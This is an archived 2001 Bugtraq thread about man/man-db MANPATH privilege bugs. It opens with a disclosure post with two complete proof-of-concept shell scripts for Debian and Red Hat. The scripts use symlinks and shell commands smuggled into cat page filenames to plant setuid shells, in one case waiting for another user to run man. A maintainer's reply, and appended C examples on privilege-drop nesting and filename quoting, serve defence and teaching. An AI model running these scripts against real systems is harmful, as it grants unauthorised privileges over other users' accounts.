6579378 2001-06-04 13:03 +0700 /49 lines/ Luki R. <luki@karet.org>
Sent by: joel@lysator.liu.se
Imported: 2001-06-04 17:10 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: luki@karet.org
Recipient: Bugtraq (import) <17239>
Subject: man/man-db MANPATH bugs exploit
------------------------------------------------------------
Hi,

In some conditions, man allows the user's PATH env. to be inserted as manpath. Man then uses the manpath value for searching directories containing manpages. This is OK until man forgets to drop privileges when creating cat page cache files using the user-supplied PATH.

I've successfully tried this on 2 different man systems, Debian's and Red Hat's. Yes, this is not a new bug, since Debian has fixed it in man-db 2.3.18-6 in unstable (hi Colin Watson :)) and 2.3.16-4, and for Red Hat see Red Hat's bugzilla #43213. Sorry if this has already been mentioned before.

Attached are complete proof of concept exploit scripts for Red Hat 7.1 and Debian 2.2, for your convenience.

I just want to say that the impact is not only creating files owned by the man uid/gid; combined with symlinks and other tricks, the results are:

[1] On Debian's man-db (<= 2.3.17-3.2, 2.3.16-3): instant user 'man' setuid shell (as user 'man' you may do something tricky to be root)
[2] On Red Hat's man (<= man-1.5h1-20): (trivial) executing any binary, i.e. to make any user's suidshell, including root

However, to produce a successful exploit we must meet these conditions:
- a man system that writes catpage caches [1] & [2]
- suid / sgid man binaries [1] & [2] (to be able to write to cache dirs)
- there is a command which has no manpage (because we will create it ;p ) [2]
- the victim user must then execute 'man <command with no manpage>' [2]

See the exploits for details.

Have a nice day,

[----- jenggo (luki@karet.org) -----]

PS: (hello, anyone interested in digging into this to get root on Red Hat? ;P)

truly greets to: echo, mayonaise and others @ #karet
Mr.gus, mega, amien, akbar ... peace, peace

(6579378) /Luki R. <luki@karet.org>/-----(Rewrapped)
Attachment (application/x-sh) in text 6579379
Attachment (application/x-sh) in text 6579380

6579379 2001-06-04 13:03 +0700 /102 lines/ Luki R. <luki@karet.org>
Imported: 2001-06-04 17:10 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: luki@karet.org
Recipient: Bugtraq (import) <17240>
Attachment (text/plain) to text 6579378
Subject: Attachment to: man/man-db MANPATH bugs exploit
------------------------------------------------------------
#!/bin/sh
###################################################
# Fri Jun  1 23:00:10 JAVT 2001                   #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs            #
# proof of concept.                               #
# version affected:                               #
#   <= man-db 2.3.16-3,2.3.17-3.2                 #
#                                                 #
# tested on:                                      #
#   debian2.2 -> instant man suidshell            #
#                                                 #
# by jenggo <luki@karet.org>                      #
#                                                 #
# thanx to: echo, mayonaise all @ #karet          #
#   ==> Mr.dur,amien,mega,akbar ... peace,peace ;)#
###################################################

TMPDIR=/tmp/mywork
RAND=`/bin/date +%S`

echo "making working dir ..."
/bin/mkdir -p $TMPDIR/man/man1
/bin/chmod 777 $TMPDIR
/bin/chmod 777 $TMPDIR/man

echo "copying needed files ..."
if [ ! -x /usr/bin/groff ] || [ ! -x /usr/bin/grotty ] || [ ! -x /usr/bin/troff ] || [ ! -x /usr/bin/gcc ]; then
  echo "Failed, I need executable : groff,grotty,troff,gcc"
  echo "cleaning up ..."
  /bin/rm -rf $TMPDIR
  exit 1    # as posted the script fell through here and kept going
fi
/bin/cp /usr/bin/groff $TMPDIR
/bin/cp /usr/bin/grotty $TMPDIR
/bin/cp /usr/bin/troff $TMPDIR

echo "compiling helper ..."
# hehe: the payload shell, later made setuid 'man' (uid 6 on Debian)
/bin/cat > $TMPDIR/hehe.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
    char *aa[2]={"/bin/sh", NULL};
    setreuid(6,6);
    execve(aa[0], aa, NULL);
    exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/hehe.c -o $TMPDIR/hehe 2>/dev/null 1>/dev/null

# mandeb: run from inside man's cat page pipeline while it still holds
# the 'man' uid; it plants a setuid-man copy of hehe in /tmp
/bin/cat > $TMPDIR/mandeb.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
    seteuid(6);
    setuid(6);
    system("/bin/cp /tmp/mywork/hehe /tmp/huhu");
    system("/bin/chown man /tmp/huhu");
    system("/bin/chmod 4755 /tmp/huhu");
    exit(0);
}
EOF
/usr/bin/gcc $TMPDIR/mandeb.c -o $TMPDIR/mandeb 2>/dev/null 1>/dev/null

echo "making our manpage ..."
# cat1 of our fake manpath is the real system cache directory
/bin/ln -s /var/cache/man/cat1 $TMPDIR/man/cat1
# the page name is a shell command; man passes it to the shell unquoted
# when it creates the cat page
/bin/echo "bebas euy"|/bin/gzip -c > $TMPDIR/man/man1/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls.1.gz"
/bin/touch $TMPDIR/"cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls"

# our PATH entry becomes a manpath component
export PATH=$TMPDIR
/usr/bin/man "cihuy$RAND.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mywork;export PATH=.;mandeb;echo ls" 2> /dev/null 1>/dev/null
echo "/bin/ls -la /var/cache/man/cat1"
/bin/ls -la /var/cache/man/cat1

export PATH=/var/cache:/bin:/sbin:/usr/bin:/usr/sbin
echo "exploiting ..."
/bin/rm -f /tmp/huhu
/usr/lib/man-db/mandb 2>/dev/null 1>/dev/null
/bin/rm -rf /tmp/mywork
echo
echo "/bin/ls -la /tmp"
/bin/ls -la /tmp
if [ -u /tmp/huhu ]; then
  echo "file /tmp/huhu is setuid. Hope it's owned by man"
  echo "Have a nice day"
  echo "[----- jenggo <luki@karet.org> -----]"
  /tmp/huhu
else
  echo "exploit failed, cleaning up our binary ..."
fi
echo "cleaning up our preparation step dir ..."
/bin/rm -rf $TMPDIR    # as posted: /tmp/$TMPDIR, which is /tmp//tmp/mywork
(6579379) /Luki R. <luki@karet.org>/-----(Rewrapped)

6579380 2001-06-04 13:03 +0700 /151 lines/ Luki R.
<luki@karet.org>
Imported: 2001-06-04 17:10 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: luki@karet.org
Recipient: Bugtraq (import) <17241>
Attachment (text/plain) to text 6579378
Subject: Attachment to: man/man-db MANPATH bugs exploit
------------------------------------------------------------
#!/bin/sh
###################################################
# Fri May 18 22:08:42 JAVT 2001                   #
# ----------------------------------------------- #
# man MANPATH symlink redirection bugs            #
# proof of concept.                               #
# version affected:                               #
#   <= man-1.5h1-20                               #
#                                                 #
# tested on:                                      #
#   redhat7.1 -> any user suidshell               #
#                                                 #
# by jenggo <luki@karet.org>                      #
#                                                 #
# thanx to: echo, mayonaise all @ #karet          #
###################################################
# hmmm ... can anyone modify this into instant root ?? :P

# IMPORTANT !
# set this to command that has no man page
DEADLY_BIN="netconf"

# on <= redhat6.2 could be /var/cache/catman
CACHEDIR="/var/cache/man"
CACHEDIR2="/var/cache/catman"
GZ="/bin/gzip"

echo -n "check man dir ..."
if [ ! -d $CACHEDIR ]; then
  if [ -d $CACHEDIR2 ]; then
    CACHEDIR=$CACHEDIR2
    echo "OK"
  else
    echo "FAILED"
    echo "check your man dir"
    exit
  fi
else
  echo "OK"
fi

echo -n "checking sgid/suid man ..."
if [ ! -g /usr/bin/man ]; then
  # is it a debian man?
  if [ -d /usr/lib/man-db ]; then
    echo "FAILED"
    echo "I think this is debian style man, use other script"
  else
    echo "FAILED"
    echo "can't find executables sgid man binary"
  fi
  exit
else
  echo "OK"
fi

echo "making our man directory ..."
echo
mkdir -p /tmp/man/man1
mkdir /tmp/cat1
mkdir /tmp/mine
chmod 777 /tmp/mine

echo "creating our man page ..."
echo
echo "BEBAS EUY"|$GZ -c > /tmp/man/man1/huhuy.1.gz

echo "creating symlink ..."
echo
# man writes huhuy's cat page through this symlink into the real cache,
# under a name that is itself a shell command (the posted script hardcoded
# "netconf" here; $DEADLY_BIN is what the final check looks for)
ln -s "$CACHEDIR/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" /tmp/cat1/huhuy.1.gz

echo "creating our bogus command ..."
echo
touch /tmp/huhuy

echo "making manx shellscript"
echo
# manx runs as whoever later types 'man $DEADLY_BIN' and leaves a
# setuid shell for that uid in /tmp/mine
/bin/cat > /tmp/mine/manx <<EOF
#!/bin/sh
export PATH="/bin:/usr/bin:/sbin:/usr/sbin"
VICTIM=\`/usr/bin/id -u\`
/bin/cat >/tmp/mine/my"\$VICTIM".c <<EOG
#include <stdio.h>
#include <unistd.h>
int main()
{
    char *hh[2]={"/bin/sh", NULL};
    setreuid(\$VICTIM,\$VICTIM);
    execve(hh[0], hh, NULL);
    return 0;
}
EOG
/usr/bin/gcc /tmp/mine/my"\$VICTIM".c -o /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
/bin/rm -f /tmp/mine/my"\$VICTIM".c 1>/dev/null 2>/dev/null
chmod 6755 /tmp/mine/my\$VICTIM 1>/dev/null 2>/dev/null
EOF
chmod 755 /tmp/mine/manx
if [ ! -x /tmp/mine/manx ]; then
  echo "file: /tmp/mine/manx can't be set executable !"
  echo "fix the exploit first"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
  exit
fi

echo "prepare to exploit ..."
echo
# relative PATH entry; from / it resolves to /tmp, and man derives a
# manpath component from it
export PATH=../../../../../../tmp
cd /
echo "exploiting ..."
echo
/usr/bin/man -d huhuy 2>/dev/null
export PATH=/bin:/usr/bin

echo "checking our exploit result"
echo
if [ -f "$CACHEDIR/cat1/$DEADLY_BIN.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;cd mine;export PATH=.;manx" ]; then
  echo "content of $CACHEDIR/cat1:"
  ls -l $CACHEDIR/cat1
  echo
  echo "exploit OK, now wait till somebody run 'man $DEADLY_BIN'"
  echo "and your suidshells will be waiting at /tmp/mine/* :)"
  echo "bye."
  echo "[-------- jenggo <luki@karet.org> --------]"
  echo
else
  echo "hrrmm ... exploit failed to create offending file !"
  echo "check again please"
  echo "cleaning up ..."
  /bin/rm -rf /tmp/man /tmp/cat1 /tmp/mine /tmp/huhuy
fi
(6579380) /Luki R. <luki@karet.org>/-----(Rewrapped)

6581444 2001-06-05 01:43 +0100 /43 lines/ Colin Watson <cjwatson@debian.org>
Sent by: joel@lysator.liu.se
Imported: 2001-06-05 07:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17255>
Comment on text 6579378 by Luki R. <luki@karet.org>
Subject: Re: man/man-db MANPATH bugs exploit
------------------------------------------------------------
From: Colin Watson <cjwatson@debian.org>
To: bugtraq@securityfocus.com
Message-ID: <E1574wk-0004BD-00@riva.ucam.org>

In article <20010604130304.A4657@gringgo>, "Luki R." <luki@karet.org> wrote:
>In some conditions, man allows the user's PATH env. to be inserted as manpath.
>Man then uses the manpath value for searching directories containing manpages.
>This is OK until man forgets to drop privileges when creating cat page
>cache files using the user-supplied PATH.
>
>I've successfully tried this on 2 different man systems, Debian's and Red Hat's.
>Yes, this is not a new bug, since Debian has fixed it in man-db 2.3.18-6
>in unstable (hi Colin Watson :)) and 2.3.16-4.

Heh, thanks. I should note that it had already been fixed in 2.3.18 (i.e. 2.3.18-1 - so really everything up to 2.3.16-3 in stable and 2.3.17.1-5 in testing/unstable is vulnerable), as I decided that that particular change was a good idea on general principles. I didn't know that it was exploitable until you filed your bug, so I hadn't updated the stable release. However, as far as I know this will be fixed in Debian 2.2r4, and in the meantime you can get 2.3.16-4 from proposed-updates.

Easy lesson from this bug, and one I doubt is unique to man: if you have functions to drop and regain effective privileges in a set[ug]id program, make sure they nest properly. In this case, man did some things "with dropped privileges" while privileges were already dropped, and thus regained them too early in a few cases.

>- suid / sgid man binaries [1] & [2] (to be able to write to cache dirs)

FYI, as of Debian man-db 2.3.18-3, man and mandb are shipped unprivileged (the user is asked if (s)he wants them setuid, but the default is no). Cat pages and database updates are nice and all that, but patching security holes was getting very old very quickly.

Thanks for your report,

-- 
Colin Watson [cjwatson@debian.org]
(6581444) /Colin Watson <cjwatson@debian.org>/(Rewrapped)
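The nesting problem in Colin Watson's "easy lesson" above, as an added example that is neither man-db's code nor anything posted in this thread: a naive drop/regain pair beside a depth-counted pair, in a model of a setuid program. The effective uid is simulated in a struct so the program runs unprivileged (real code would call seteuid(ruid) to drop and seteuid(priv_uid) to regain); the uids (1000 for the invoking user, 6 for `man`, the value the Debian PoC uses) and the helper name `write_into_user_dir` are assumptions.

```c
/* Added example for the "make sure they nest properly" lesson.
 * Not man-db's code: euid is simulated so this runs unprivileged. */
#include <stdio.h>

typedef struct {
    int ruid;      /* real uid: the user who ran the program (assumed 1000) */
    int priv_uid;  /* uid the binary is setuid to (assumed 6, Debian's 'man') */
    int euid;      /* simulated effective uid */
    int depth;     /* open drops; used by the counted version only */
} privs;

static void privs_init(privs *p, int ruid, int priv_uid)
{
    p->ruid = ruid;
    p->priv_uid = priv_uid;
    p->euid = priv_uid;   /* a setuid binary starts with euid == file owner */
    p->depth = 0;
}

/* Naive pair: drop always lowers, regain always raises.  When two pairs
 * nest, the INNER regain re-raises while the outer section still runs. */
static void naive_drop(privs *p)   { p->euid = p->ruid; }
static void naive_regain(privs *p) { p->euid = p->priv_uid; }

/* Counted pair: only the first drop lowers and only the matching
 * outermost regain raises, so nested sections stay dropped. */
static void counted_drop(privs *p)   { if (p->depth++ == 0) p->euid = p->ruid; }
static void counted_regain(privs *p) { if (--p->depth == 0) p->euid = p->priv_uid; }

/* Hypothetical helper written as if always entered privileged: drop,
 * create something in a user-controlled directory, regain. */
static void write_into_user_dir(privs *p, void (*drop)(privs *), void (*regain)(privs *))
{
    drop(p);
    /* ... the file would be created here, as p->euid ... */
    regain(p);
}

/* Caller that dropped for a whole section, calls the helper, then keeps
 * working in the belief that it is still unprivileged.
 * inner = euid during that later work, final = euid after the section. */
static void scenario(int naive, int *inner, int *final)
{
    privs p;
    void (*drop)(privs *)   = naive ? naive_drop   : counted_drop;
    void (*regain)(privs *) = naive ? naive_regain : counted_regain;
    privs_init(&p, 1000, 6);
    drop(&p);                              /* "unprivileged from here on" */
    write_into_user_dir(&p, drop, regain);
    *inner = p.euid;                       /* what the caller really runs as now */
    regain(&p);                            /* end of the outer section */
    *final = p.euid;
}

int inner_euid(int naive) { int i, f; scenario(naive, &i, &f); return i; }
int final_euid(int naive) { int i, f; scenario(naive, &i, &f); return f; }

int main(void)
{
    printf("naive:   euid after nested helper = %d (regained too early)\n", inner_euid(1));
    printf("counted: euid after nested helper = %d (still dropped)\n", inner_euid(0));
    printf("end of outer section: naive %d, counted %d\n", final_euid(1), final_euid(0));
    return 0;
}
```

With the naive pair the caller's remaining work runs as uid 6 although it believes it is dropped; the counted pair keeps it at 1000 until the outermost regain. A real implementation should also check the return value of every seteuid() call, since a failed drop that goes unnoticed is the same bug with a different cause.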
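Both PoC scripts in this thread put `;cd ..;…;export PATH=.;mandeb` (or `…;manx`) into the page name, which, as I read the scripts, only pays off because man hands that name unquoted to a shell while building the cat page. The following added example, in C and not taken from the scripts or from man, reproduces that pattern with a harmless payload and shows one hardening, single-quoting the name before it reaches `sh -c`. The builder names, `echo` standing in for the gzip pipeline, and the payload string are all constructed for the example.

```c
/* Added example, not code from the PoC scripts or from man: why a page
 * name like "foo.1.gz;cd ..;...;mandeb;echo ls" works.  A program that
 * builds a shell command by string concatenation lets every ';' in the
 * filename start a new command.  Here `echo` stands in for the cat page
 * pipeline and the injected command just prints a marker. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* The careless builder: raw concatenation of the page name. */
int build_unsafe(char *out, size_t n, const char *page)
{
    return snprintf(out, n, "echo %s", page) < (int)n;
}

/* Single-quote a string for /bin/sh; an embedded ' becomes '\''.
 * Returns 0 if out is too small. */
int shell_quote(char *out, size_t n, const char *s)
{
    size_t j = 0;
    if (n < 3) return 0;
    out[j++] = '\'';
    for (; *s; s++) {
        if (*s == '\'') {
            if (j + 6 > n) return 0;
            memcpy(out + j, "'\\''", 4);
            j += 4;
        } else {
            if (j + 3 > n) return 0;
            out[j++] = *s;
        }
    }
    out[j++] = '\'';
    out[j] = '\0';
    return 1;
}

/* The hardened builder: the page name reaches the shell as one word. */
int build_safe(char *out, size_t n, const char *page)
{
    char q[512];
    if (!shell_quote(q, sizeof q, page)) return 0;
    return snprintf(out, n, "echo %s", q) < (int)n;
}

/* Run cmd via the shell (as popen/system would) and capture its output. */
int run_capture(const char *cmd, char *out, size_t n)
{
    size_t got;
    FILE *p = popen(cmd, "r");
    if (!p) return 0;
    got = fread(out, 1, n - 1, p);
    out[got] = '\0';
    return pclose(p) != -1;
}

/* Same constructed page name through both builders. */
int demo(char *unsafe_out, size_t un, char *safe_out, size_t sn)
{
    const char *page = "foo.1.gz;echo INJECTED";   /* constructed payload */
    char cmd[1024];
    if (!build_unsafe(cmd, sizeof cmd, page) || !run_capture(cmd, unsafe_out, un)) return 0;
    if (!build_safe(cmd, sizeof cmd, page) || !run_capture(cmd, safe_out, sn)) return 0;
    return 1;
}

/* 1 when the unquoted build ran the injected command (two output lines)
 * and the quoted build echoed the literal name back (one line). */
int injection_confirmed(void)
{
    char a[256], b[256];
    if (!demo(a, sizeof a, b, sizeof b)) return 0;
    return strcmp(a, "foo.1.gz\nINJECTED\n") == 0
        && strcmp(b, "foo.1.gz;echo INJECTED\n") == 0;
}

/* 1 when quoting survives an embedded single quote: a'b -> 'a'\''b' */
int quote_handles_apostrophe(void)
{
    char q[32];
    return shell_quote(q, sizeof q, "a'b") && strcmp(q, "'a'\\''b'") == 0;
}

int main(void)
{
    char a[256], b[256];
    if (!demo(a, sizeof a, b, sizeof b)) return 1;
    printf("unquoted:\n%s", a);
    printf("quoted:\n%s", b);
    return 0;
}
```

Quoting closes the hole in the command string, but the stronger fix is not to involve a shell at all: fork and execve the tool with an argv array, so the filename is never parsed as syntax. Neither is a description of man-db's actual patch, which this thread does not show.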